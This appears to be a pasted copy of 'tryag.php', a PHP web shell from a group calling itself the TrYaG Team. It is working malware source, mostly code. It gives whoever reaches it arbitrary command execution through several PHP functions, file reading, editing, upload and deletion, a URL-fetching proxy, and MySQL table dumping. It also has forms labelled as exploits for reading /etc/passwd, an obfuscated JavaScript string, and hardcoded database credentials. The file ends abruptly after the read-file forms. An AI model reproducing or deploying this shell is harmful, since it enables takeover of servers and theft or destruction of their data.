· 5 years ago · Aug 08, 2020, 08:20 PM
1<?php
2/******************************************************************************************************/
3/* tryag.php - https://www.youtube.com/channel/UCag2xiYkYWTgMOSjszUXafg?view_as=subscriber
4/* ãäÙãÉ ÇáßÇÓÑ ÇáÐåÈí: https://www.youtube.com/channel/UCag2xiYkYWTgMOSjszUXafg?view_as=subscriber
5/* by: 1.0 (03.10.2006)
6/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
7/*
8/*
9/* by tryag@tryag.com
10/******************************************************************************************************/
11
12
13/******************************************************************************************************/
14
15?>
16
17
18<html>
19<head>
20<title>* ReJect Secret * </title>
21<script type="text/javascript" language="javascript">
22<!--
23ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
24MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
25OT="";
26for(j=0;j<MI.length;j++){
27OT+=ML.charAt(MI.charCodeAt(j)-48);
28}document.write(OT);
29// --></script>
30<body bgcolor="#000000">
31<table Width='100%' height='10%' bgcolor='#AA0000' border='1'>
32<tr>
33<td><center><font size='6' color='#BBB516'> tRyaG TeaM ___ IsL4m1C ~ W4rR10R</font></center></td>
34</tr>
35</table>
36<style type="text/css">
37body, td {
38 font-family: "Tahoma";
39 font-size: "12px";
40 line-height: "150%";
41}
42.smlfont {
43 font-family: "Tahoma";
44 font-size: "11px";
45}
46.INPUT {
47 FONT-SIZE: "12px";
48 COLOR: "#000000";
49 BACKGROUND-COLOR: "#FFFFFF";
50 height: "18px";
51 border: 1px solid #666666 none;
52 padding-left: "2px"
53}
54.redfont {
55 COLOR: "#A60000";
56}
57a:link, a:visited, a:active {
58 color: "#FF0000";
59 text-decoration: underline;
60}
61a:hover {
62 color: "#FFFFFF";
63 text-decoration: none;
64}
65.top {BACKGROUND-COLOR: "#AA0000"}
66.firstalt {BACKGROUND-COLOR: "#000000"}
67.secondalt {BACKGROUND-COLOR: "#000000"}
68</style>
69<SCRIPT language=JavaScript>
70function CheckAll(form) {
71 for (var i=0;i<form.elements.length;i++) {
72 var e = form.elements[i];
73 if (e.name != 'chkall')
74 e.checked = form.chkall.checked;
75 }
76}
77function really(d,f,m,t) {
78 if (confirm(m)) {
79 if (t == 1) {
80 window.location.href='?dir='+d+'&deldir='+f;
81 } else {
82 window.location.href='?dir='+d+'&delfile='+f;
83 }
84 }
85}
86</SCRIPT>
87</head>
88
89<body>
90<center>
91
92<hr width="775" noshade>
93<table width="775" border="0" cellpadding="0">
94<?PHP
95
96
97
98error_reporting(7);
99ob_start();
100$mtime = explode(' ', microtime());
101$starttime = $mtime[1] + $mtime[0];
102$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
103if ($onoff != 1) {
104 @extract($_POST, EXTR_SKIP);
105 @extract($_GET, EXTR_SKIP);
106}
107$mohajer = getcwd();
108$self = $_SERVER['PHP_SELF'];
109$dis_func = get_cfg_var("disable_functions");
110
111///////////////////////////////
112 //
113$mysql_use = "no"; //"yes" //
114$mhost = "localhost"; //
115$muser = "mjalnet_mjal"; //
116$mpass = "99080806"; //
117$mdb = "mjalnet_vb"; //
118 //
119///////////////////////////////
120
121
122if (get_magic_quotes_gpc()) {
123 $_GET = stripslashes_array($_GET);
124 $_POST = stripslashes_array($_POST);
125}
126
127
128
129if (empty($_POST['phpinfo'] )) {
130 }else{
131 echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()";
132 exit;
133}
134
135
136if (isset($_POST['url'])) {
137 $proxycontents = @file_get_contents($_POST['url']);
138 echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>»ñÈ¡ URL ÄÚÈÝʧ°Ü</b></p></center></body>";
139 exit;
140}
141
142if (empty($_POST['TrYaG'] ) ) {
143 }ELSE{
144 $action = '?action=TrYaG';
145 echo "<table Width='100%' height='10%' bgcolor='#000000' border='1'><tr><td><center><font size='6' color='#BBB516'>
146ÇáßÇÓÑ ÇáÐåÈí<br><br>
147020 <br><br>
148ÇáãåÇÌÑ22 <br><br>
149ÇÈæãíáÇÝ <br><br>
150ÚÐÇÈí ÛíÑ <br><br>
151cRiMiNaL NeT <br><br>
152MR.WOLF <br><br>
153ÚÈÏÇááå00 <br><br>
154ãÍãæÏ Úáí <br><br>
155ÞÇåÑ ÇáíåæÏ <br><br>
156al3iznet <br><br>
157ÇáæÍÔ ÇáßÇÓÑ<br><br>
158ÌãíÚ ÇáÍÞæÞ ãÍÝæÙÉ <br><br>
159ãäÙãÉ ÇáßÇÓÑ ÇáÐåÈí & ÊÑíÇÞ ÇáÚÑÈ <br><br>
160WWW.TrYaG.CoM/vb <br><br>
161íÓãÍ ÈÇáäÞá ÈÓ ÇÑÌæ ÚÏã ÇÒÇáå ÍÞæÞ ÇáÝÑ íÞ <br><br>";
162
163
164 echo "</font></center></td></tr></table> ";
165
166 exit;
167 }
168if (empty($_POST['command'] ) ) {
169 }ELSE{
170 if (substr(PHP_OS, 0, 3) == 'WIN') {
171 $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
172 $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
173
174 echo "</form>\n";
175 }
176$tb = new FORMS;
177
178$tb->tableheader();
179$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
180$tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
181$tb->tablefooter();
182$tb->tableheader();
183$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ]</b></td></tr></table>','center','top');
184$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
185
186$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
187$tb->headerform(array('content'=>'<FONT COLOR=RED>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
188
189 echo"<tr class='secondalt'><td align='center'><textarea name='textarea' cols='100' rows='25' readonly>";
190
191 if ($_POST['command'] ) {
192
193 if ($execfunc=="system") {
194 system($_POST['command']);
195 } elseif ($execfunc=="passthru") {
196 passthru($_POST['command']);
197 } elseif ($execfunc=="exec") {
198 $result = exec($_POST['command']);
199 echo $result;
200 } elseif ($execfunc=="shell_exec") {
201 $result=shell_exec($_POST['command']);
202 echo $result;
203 } elseif ($execfunc=="popen") {
204 $pp = popen($_POST['command'], 'r');
205 $read = fread($pp, 2096);
206 echo $read;
207 pclose($pp);
208 } elseif ($execfunc=="wscript") {
209 $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
210 $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
211 $stdout = $exec->StdOut();
212 $stroutput = $stdout->ReadAll();
213 echo $stroutput;
214 } else {
215 system($_POST['command']);
216 }
217
218 }
219
220echo"</textarea></td></tr></form></table>";
221 exit;
222}//end shell
223
224if ($_POST['editfile']){
225$fp = fopen($_POST['editfile'], "r");
226$filearr = file($_POST['editfile']);
227
228foreach ($filearr as $string){
229
230$content = $content . $string;
231}
232
233echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUEST_URI' method='POST'><textarea name=content cols=122 rows=20>";echo htmlentities($content); echo"</textarea>";
234echo"<input type='hidden' name='dir' value='" . getcwd() ."'>
235<input type='hidden' name='savefile' value='{$_POST['editfile']}'><br>
236<input type='submit' name='submit' value='Save'></form></center>";
237fclose($fp);
238}
239
240
241if($_POST['savefile']){
242
243$fp = fopen($_POST['savefile'], "w");
244$content = stripslashes($content);
245fwrite($fp, $content);
246fclose($fp);
247echo "<center><div id=logostrip>Successfully saved!</div></center>";
248
249}
250if ($doupfile) {
251 echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!";
252}
253
254
255elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
256 if (!empty($newdirectory)) {
257 $mkdirs="$dir/$newdirectory";
258 if (file_exists("$mkdirs")) {
259 echo "can't make dir";
260 } else {
261 echo (@mkdir("$mkdirs",0777)) ? "ok" : "";
262 @chmod("$mkdirs",0777);
263 }
264 }
265}
266
267/////////
268$pathname=str_replace('\\','/',dirname(__FILE__));
269
270////////
271if (!isset($dir) or empty($dir)) {
272 $dir = ".";
273 $nowpath = getPath($pathname, $dir);
274} else {
275 $dir=$_post['dir'];
276 $nowpath = getPath($pathname, $dir);
277}
278
279///////
280$dir_writeable = (dir_writeable($nowpath)) ? "m" : "mm";
281$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
282$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\"mohajer22</a>" : "";
283
284$tb = new FORMS;
285
286$tb->tableheader();
287$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
288$tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
289$tb->tablefooter();
290$tb->tableheader();
291$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Editfile or make & Uploud file & Make directory</b></td></tr></table>','center','top');
292$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
293$tb->headerform(array('content'=>'<FONT COLOR=RED>File to edit or make:</FONT>'.$tb->makehidden('dir', getcwd() ).' '.$tb->makeinput('editfile').' '.$tb->makeinput('Edit','editfile','','submit')));
294
295
296$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'<FONT COLOR=RED>Uploud file:</FONT>'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','up','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
297
298$tb->headerform(array('content'=>'<FONT COLOR=RED>Make directory:</FONT> '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','newdirectory','','submit')));
299$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
300$tb->headerform(array('content'=>'<FONT COLOR=RED>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
301
302$tb->tdbody ("</td></tr></table>");
303if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
304
305
306 $tb->tableheader();
307echo"<tr bgcolor='#AA0000'><td align='center' nowrap width='27%'><b>DIR</b></td><td align='center' nowrap width='16%'><b>First data</b></td><td align='center' nowrap width='16%'><b>Last data</b></td><td align='center' nowrap width='11%'><b>Size</b></td><td align='center' nowrap width='6%'><b>Perm</b></td></tr>";
308
309$dirs=@opendir($dir);
310$dir_i = '0';
311while ($file=@readdir($dirs)) {
312 $filepath="$dir/$file";
313 $a=@is_dir($filepath);
314 if($a=="1"){
315 if($file!=".." && $file!=".") {
316 $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
317 $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
318 $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
319 echo "<tr class=".getrowbg().">\n";
320 echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
321 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n";
322 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n";
323 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\"><dir></span></td>\n";
324 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$dirperm</span></td>\n";
325 echo "</tr>\n";
326 $dir_i++;
327 } else {
328 if($file=="..") {
329 echo "<tr class=".getrowbg().">\n";
330 echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">Up dir</a></td>\n";
331 echo "</tr>\n";
332 }
333 }
334 }
335}// while
336@closedir($dirs);
337
338echo"<tr bgcolor='#cccccc'><td colspan='6' height='5'></td></tr><FORM method='POST'>";
339
340$dirs=@opendir($dir);
341$file_i = '0';
342while ($file=@readdir($dirs)) {
343 $filepath="$dir/$file";
344 $a=@is_dir($filepath);
345 if($a=="0"){
346 $size=@filesize($filepath);
347 $size=$size/1024 ;
348 $size= @number_format($size, 3);
349 if (@filectime($filepath) == @filemtime($filepath)) {
350 $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
351 $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
352 } else {
353 $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
354 $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
355 }
356 @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
357 echo "<tr class=".getrowbg().">\n";
358 echo " <td style=\"padding-left: 5px;\">";
359 echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
360 echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
361 if ($file == 'config.php') {
362
363 echo "<a href=\"$filepath\" target=\"_blank\"><font color='yellow'>$file<STRONG></STRONG></a></td>\n";
364 }
365 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n";
366 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n";
367 echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
368 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$fileperm</span></td>\n";
369 echo "</tr>\n";
370 $file_i++;
371
372
373 }
374}// while
375@closedir($dirs);
376
377echo "</FORM>\n";
378echo "</table>\n";
379}// end dir
380
381
382
383
384
385
386
387 function debuginfo() {
388 global $starttime;
389 $mtime = explode(' ', microtime());
390 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
391 echo "Processed in $totaltime second(s)";
392 }
393
394
395 function stripslashes_array(&$array) {
396 while(list($key,$var) = each($array)) {
397 if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
398 if (is_string($var)) {
399 $array[$key] = stripslashes($var);
400 }
401 if (is_array($var)) {
402 $array[$key] = stripslashes_array($var);
403 }
404 }
405 }
406 return $array;
407 }
408
409
410 function deltree($deldir) {
411 $mydir=@dir($deldir);
412 while($file=$mydir->read()) {
413 if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
414 @chmod("$deldir/$file",0777);
415 deltree("$deldir/$file");
416 }
417 if (is_file("$deldir/$file")) {
418 @chmod("$deldir/$file",0777);
419 @unlink("$deldir/$file");
420 }
421 }
422 $mydir->close();
423 @chmod("$deldir",0777);
424 return (@rmdir($deldir)) ? 1 : 0;
425 }
426
427
428 function dir_writeable($dir) {
429 if (!is_dir($dir)) {
430 @mkdir($dir, 0777);
431 }
432 if(is_dir($dir)) {
433 if ($fp = @fopen("$dir/test.txt", 'w')) {
434 @fclose($fp);
435 @unlink("$dir/test.txt");
436 $writeable = 1;
437 } else {
438 $writeable = 0;
439 }
440 }
441 return $writeable;
442 }
443
444
445 function getrowbg() {
446 global $bgcounter;
447 if ($bgcounter++%2==0) {
448 return "firstalt";
449 } else {
450 return "secondalt";
451 }
452 }
453
454
455 function getPath($mainpath, $relativepath) {
456 global $dir;
457 $mainpath_info = explode('/', $mainpath);
458 $relativepath_info = explode('/', $relativepath);
459 $relativepath_info_count = count($relativepath_info);
460 for ($i=0; $i<$relativepath_info_count; $i++) {
461 if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
462 if ($relativepath_info[$i] == '..') {
463 $mainpath_info_count = count($mainpath_info);
464 unset($mainpath_info[$mainpath_info_count-1]);
465 continue;
466 }
467 $mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
468 }
469 return implode('/', $mainpath_info);
470 }
471
472
473 function getphpcfg($varname) {
474 switch($result = get_cfg_var($varname)) {
475 case 0:
476 return "No";
477 break;
478 case 1:
479 return "Yes";
480 break;
481 default:
482 return $result;
483 break;
484 }
485 }
486
487
488 function getfun($funName) {
489 return (false !== function_exists($funName)) ? "Yes" : "No";
490 }
491
492
493 class PHPZip{
494 var $out='';
495 function PHPZip($dir) {
496 if (@function_exists('gzcompress')) {
497 $curdir = getcwd();
498 if (is_array($dir)) $filelist = $dir;
499 else{
500 $filelist=$this -> GetFileList($dir);//ÎļþÁбí
501 foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
502 }
503 if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
504 else chdir($curdir);
505 if (count($filelist)>0){
506 foreach($filelist as $filename){
507 if (is_file($filename)){
508 $fd = fopen ($filename, "r");
509 $content = @fread ($fd, filesize ($filename));
510 fclose ($fd);
511 if (is_array($dir)) $filename = basename($filename);
512 $this -> addFile($content, $filename);
513 }
514 }
515 $this->out = $this -> file();
516 chdir($curdir);
517 }
518 return 1;
519 }
520 else return 0;
521 }
522
523
524 function GetFileList($dir){
525 static $a;
526 if (is_dir($dir)) {
527 if ($dh = opendir($dir)) {
528 while (($file = readdir($dh)) !== false) {
529 if($file!='.' && $file!='..'){
530 $f=$dir .'/'. $file;
531 if(is_dir($f)) $this->GetFileList($f);
532 $a[]=$f;
533 }
534 }
535 closedir($dh);
536 }
537 }
538 return $a;
539 }
540
541 var $datasec = array();
542 var $ctrl_dir = array();
543 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
544 var $old_offset = 0;
545
546 function unix2DosTime($unixtime = 0) {
547 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
548 if ($timearray['year'] < 1980) {
549 $timearray['year'] = 1980;
550 $timearray['mon'] = 1;
551 $timearray['mday'] = 1;
552 $timearray['hours'] = 0;
553 $timearray['minutes'] = 0;
554 $timearray['seconds'] = 0;
555 } // end if
556 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
557 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
558 }
559
560 function addFile($data, $name, $time = 0) {
561 $name = str_replace('\\', '/', $name);
562
563 $dtime = dechex($this->unix2DosTime($time));
564 $hexdtime = '\x' . $dtime[6] . $dtime[7]
565 . '\x' . $dtime[4] . $dtime[5]
566 . '\x' . $dtime[2] . $dtime[3]
567 . '\x' . $dtime[0] . $dtime[1];
568 eval('$hexdtime = "' . $hexdtime . '";');
569 $fr = "\x50\x4b\x03\x04";
570 $fr .= "\x14\x00";
571 $fr .= "\x00\x00";
572 $fr .= "\x08\x00";
573 $fr .= $hexdtime;
574
575 $unc_len = strlen($data);
576 $crc = crc32($data);
577 $zdata = gzcompress($data);
578 $c_len = strlen($zdata);
579 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
580 $fr .= pack('V', $crc);
581 $fr .= pack('V', $c_len);
582 $fr .= pack('V', $unc_len);
583 $fr .= pack('v', strlen($name));
584 $fr .= pack('v', 0);
585 $fr .= $name;
586
587 $fr .= $zdata;
588
589 $fr .= pack('V', $crc);
590 $fr .= pack('V', $c_len);
591 $fr .= pack('V', $unc_len);
592
593 $this -> datasec[] = $fr;
594 $new_offset = strlen(implode('', $this->datasec));
595
596 $cdrec = "\x50\x4b\x01\x02";
597 $cdrec .= "\x00\x00";
598 $cdrec .= "\x14\x00";
599 $cdrec .= "\x00\x00";
600 $cdrec .= "\x08\x00";
601 $cdrec .= $hexdtime;
602 $cdrec .= pack('V', $crc);
603 $cdrec .= pack('V', $c_len);
604 $cdrec .= pack('V', $unc_len);
605 $cdrec .= pack('v', strlen($name) );
606 $cdrec .= pack('v', 0 );
607 $cdrec .= pack('v', 0 );
608 $cdrec .= pack('v', 0 );
609 $cdrec .= pack('v', 0 );
610 $cdrec .= pack('V', 32 );
611 $cdrec .= pack('V', $this -> old_offset );
612 $this -> old_offset = $new_offset;
613 $cdrec .= $name;
614
615 $this -> ctrl_dir[] = $cdrec;
616 }
617
618 function file() {
619 $data = implode('', $this -> datasec);
620 $ctrldir = implode('', $this -> ctrl_dir);
621 return
622 $data .
623 $ctrldir .
624 $this -> eof_ctrl_dir .
625 pack('v', sizeof($this -> ctrl_dir)) .
626 pack('v', sizeof($this -> ctrl_dir)) .
627 pack('V', strlen($ctrldir)) .
628 pack('V', strlen($data)) .
629 "\x00\x00";
630 }
631 }
632
633 function sqldumptable($table, $fp=0) {
634 $tabledump = "DROP TABLE IF EXISTS $table;\n";
635 $tabledump .= "CREATE TABLE $table (\n";
636
637 $firstfield=1;
638
639 $fields = mysql_query("SHOW FIELDS FROM $table");
640 while ($field = mysql_fetch_array($fields)) {
641 if (!$firstfield) {
642 $tabledump .= ",\n";
643 } else {
644 $firstfield=0;
645 }
646 $tabledump .= " $field[Field] $field[Type]";
647 if (!empty($field["Default"])) {
648 $tabledump .= " DEFAULT '$field[Default]'";
649 }
650 if ($field['Null'] != "YES") {
651 $tabledump .= " NOT NULL";
652 }
653 if ($field['Extra'] != "") {
654 $tabledump .= " $field[Extra]";
655 }
656 }
657 mysql_free_result($fields);
658
659 $keys = mysql_query("SHOW KEYS FROM $table");
660 while ($key = mysql_fetch_array($keys)) {
661 $kname=$key['Key_name'];
662 if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
663 $kname="UNIQUE|$kname";
664 }
665 if(!is_array($index[$kname])) {
666 $index[$kname] = array();
667 }
668 $index[$kname][] = $key['Column_name'];
669 }
670 mysql_free_result($keys);
671
672 while(list($kname, $columns) = @each($index)) {
673 $tabledump .= ",\n";
674 $colnames=implode($columns,",");
675
676 if ($kname == "PRIMARY") {
677 $tabledump .= " PRIMARY KEY ($colnames)";
678 } else {
679 if (substr($kname,0,6) == "UNIQUE") {
680 $kname=substr($kname,7);
681 }
682 $tabledump .= " KEY $kname ($colnames)";
683 }
684 }
685
686 $tabledump .= "\n);\n\n";
687 if ($fp) {
688 fwrite($fp,$tabledump);
689 } else {
690 echo $tabledump;
691 }
692
693 $rows = mysql_query("SELECT * FROM $table");
694 $numfields = mysql_num_fields($rows);
695 while ($row = mysql_fetch_array($rows)) {
696 $tabledump = "INSERT INTO $table VALUES(";
697
698 $fieldcounter=-1;
699 $firstfield=1;
700 while (++$fieldcounter<$numfields) {
701 if (!$firstfield) {
702 $tabledump.=", ";
703 } else {
704 $firstfield=0;
705 }
706
707 if (!isset($row[$fieldcounter])) {
708 $tabledump .= "NULL";
709 } else {
710 $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
711 }
712 }
713
714 $tabledump .= ");\n";
715
716 if ($fp) {
717 fwrite($fp,$tabledump);
718 } else {
719 echo $tabledump;
720 }
721 }
722 mysql_free_result($rows);
723 }
724
725 class FORMS {
726 function tableheader() {
727 echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
728 }
729
730 function headerform($arg=array()) {
731 global $dir;
732 if ($arg[enctype]){
733 $enctype="enctype=\"$arg[enctype]\"";
734 } else {
735 $enctype="";
736 }
737 if (!isset($arg[method])) {
738 $arg[method] = "POST";
739 }
740 if (!isset($arg[action])) {
741 $arg[action] = '';
742 }
743 echo " <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
744 echo " <tr>\n";
745 echo " <td>".$arg[content]."</td>\n";
746 echo " </tr>\n";
747 echo " </form>\n";
748 }
749
750 function tdheader($title) {
751 global $dir;
752 echo " <tr class=\"firstalt\">\n";
753 echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·mohajer</a>]</b></td>\n";
754 echo " </tr>\n";
755 }
756
757 function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
758 if ($bgcolor=='2') {
759 $css="secondalt";
760 } elseif ($bgcolor=='1') {
761 $css="firstalt";
762 } else {
763 $css=$bgcolor;
764 }
765 $height = empty($height) ? "" : " height=".$height;
766 $colspan = empty($colspan) ? "" : " colspan=".$colspan;
767 echo " <tr class=\"".$css."\">\n";
768 echo " <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
769 echo " </tr>\n";
770 }
771
772 function tablefooter() {
773 echo "</table>\n";
774 }
775
776 function formheader($action='',$title,$target='') {
777 global $dir;
778 $target = empty($target) ? "" : " target=\"".$target."\"";
779 echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
780 echo " <tr class=\"firstalt\">\n";
781 echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·µ»Ø</a>]</b></td>\n";
782 echo " </tr>\n";
783 }
784
785 function makehidden($name,$value=''){
786 echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
787 }
788
789 function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
790 $css = ($css == 'input') ? " class=\"input\"" : "";
791 $input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
792 return $input;
793 }
794 function makeid($name,$value='',$extra='',$type='select',$size='30',$css='input'){
795 $css = ($css == 'input') ? " class=\"input\"" : "";
796 $input = "<select name=plugin><option>cat /etc/passwd</option></select>";
797 return $input;
798 }
799 function makeimp($name,$value='',$extra='',$type='select',$size='30',$css='input'){
800 $css = ($css == 'input') ? " class=\"input\"" : "";
801 $input = "<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>";
802 return $input;
803 }
804 function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
805 $textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
806 return $textarea;
807 }
808
809 function formfooter($over='',$height=''){
810 $height = empty($height) ? "" : " height=\"".$height."\"";
811 echo " <tr class=\"secondalt\">\n";
812 echo " <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value='mohajer'></td>\n";
813 echo " </tr>\n";
814 echo " </form>\n";
815 echo $end = empty($over) ? "" : "</table>\n";
816 }
817
818 function makeselect($arg = array()){
819 if ($arg[multiple]==1) {
820 $multiple = " multiple";
821 if ($arg[size]>0) {
822 $size = "size=$arg[size]";
823 }
824 }
825 if ($arg[css]==0) {
826 $css = "class=\"input\"";
827 }
828 $select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
829 if (is_array($arg[option])) {
830 foreach ($arg[option] AS $key=>$value) {
831 if (!is_array($arg[selected])) {
832 if ($arg[selected]==$key) {
833 $select .= "<option value=\"$key\" selected>$value</option>\n";
834 } else {
835 $select .= "<option value=\"$key\">$value</option>\n";
836 }
837
838 } elseif (is_array($arg[selected])) {
839 if ($arg[selected][$key]==1) {
840 $select .= "<option value=\"$key\" selected>$value</option>\n";
841 } else {
842 $select .= "<option value=\"$key\">$value</option>\n";
843 }
844 }
845 }
846 }
847 $select .= "</select>\n";
848 return $select;
849 }
850 }
851
852
853
854$tb->tableheader();
855$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: read file [SQL , id , CURL , copy , ini_restore , imap] & Make file ERORR</b></td></tr></table>','center','top');
856$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
857
858
859$tb->headerform(array('content'=>'<FONT COLOR=RED>read file SQL:</FONT><br>' .$tb->makeinput('Mohajer22','/etc/passwd' ).$tb->makeinput('',Show,'Mohajer22','submit')));
860$tb->headerform(array('content'=>'<FONT COLOR=RED>read file id:</FONT><br>' .$tb->makeid('plugin','cat /etc/passwd' ).$tb->makeinput('',Show,'plugin','submit')));
861$tb->headerform(array('content'=>'<FONT COLOR=RED>read file CURL:</FONT><br>' .$tb->makeinput('curl','/etc/passwd' ).$tb->makeinput('',Show,'curl','submit')));
